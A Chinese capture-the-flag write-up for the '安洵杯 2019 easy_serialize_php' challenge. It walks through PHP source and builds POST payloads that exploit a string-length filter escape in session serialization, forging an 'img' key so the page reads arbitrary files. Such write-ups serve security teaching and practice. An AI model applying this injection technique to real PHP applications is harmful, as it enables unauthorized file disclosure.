[安洵杯 2019]easy_serialize_php
[安洵杯 2019]easy_serialize_php
现在对反序列化题目的思路越来越清晰了,也觉得更有趣了。
开淦
首先打开网页,点击source_code
一大串代码,给人眼花撩乱的感觉挺复杂的
简单审计了一下,还是发现了一个危险函数file_get_contents(),同时也看到了一个unserialize操作
else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
这里又提到了在phpinfo里面可能可以得到一些提示
那么先
?f=phpinfo一探究竟
![[安洵杯 2019]easy_serialize_php_第1张图片](http://img.e-com-net.com/image/info8/c2a789c4f6334936886bba4739f5caec.jpg)
那么我们就要使用这个危险函数来读取这个php文件
继续之前的思路
$userinfo是反序列化$serialize_info的结果
跟进
$serialize_info = filter(serialize($_SESSION));
这里我们可以看到$_SESSION变量是经过filter函数处理过的。
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
filter函数也就将一些敏感字符串替换为空,但却为后文买下了伏笔
继续向下看
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
这里就是数据传入的地方,extract变量使我们可以控制这两个参数,ok,再看最后一部分了
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
这里控制img_path我想也是不现实的,因为经过了sha1函数处理,所以我们目前可以控制的点,$_SESSION[user]和$_SESSION[function]
好的,那么接下来我们开始构造
$_SESSION["user"] = '{1}';
$_SESSION['function'] = '{2}';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);
首先我们看看正常序列化的结果:
a:3:{s:4:"user";s:3:"{1}";s:8:"function";s:3:"{2}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
可以看到{1}和{2}是我们可以控制的点
那么我们可以构造一个这样的$_SESSION[function]
";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
而之前的filter函数将php flag啥的都替换为空,那么我们就可以使$_SESSION[user]="“中字符串的长度等于”;s:8:“function”;s:41:"一共23位
故
$_SESSION['user']="flagflagflagflagphpflag"
综合
$_SESSION['user']="flagflagflagphpflagflag";
$_SESSION['function'] = '";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);
序列化结果为
a:3:{s:4:"user";s:23:"flagflagflagphpflagflag";s:8:"function";s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于经过filter函数的处理,变为
a:3:{s:4:"user";s:23:"";s:8:"function";s:41:"";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
反序列化结果为:
array(2)
{
["user"]=>string(23)"";s:8:"function";s:41:""
["img"]=> string(20) "ZDBnM19mMWFnLnBocA=="
}
但是经过反序列化之后,原来是三个键值,但这里只有两个键值,无法反序列化成功,所以我们需要自己再加上一个键值
故最终
$_SESSION['function']="";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a"}"
故传入参数
_SESSION[user]=flagflagflagphpflagflag&_SESSION[function] =";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:1:"a";}
![[安洵杯 2019]easy_serialize_php_第2张图片](http://img.e-com-net.com/image/info8/3813623ca8f7422badf2da798db43035.jpg)
查看源代码
![[安洵杯 2019]easy_serialize_php_第3张图片](http://img.e-com-net.com/image/info8/1f877e05947d44b78f5efe826d15fccf.jpg)
修改payload为:
_SESSION[user]=flagflagflagphpflagflag&_SESSION[function] =";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:1:"a";}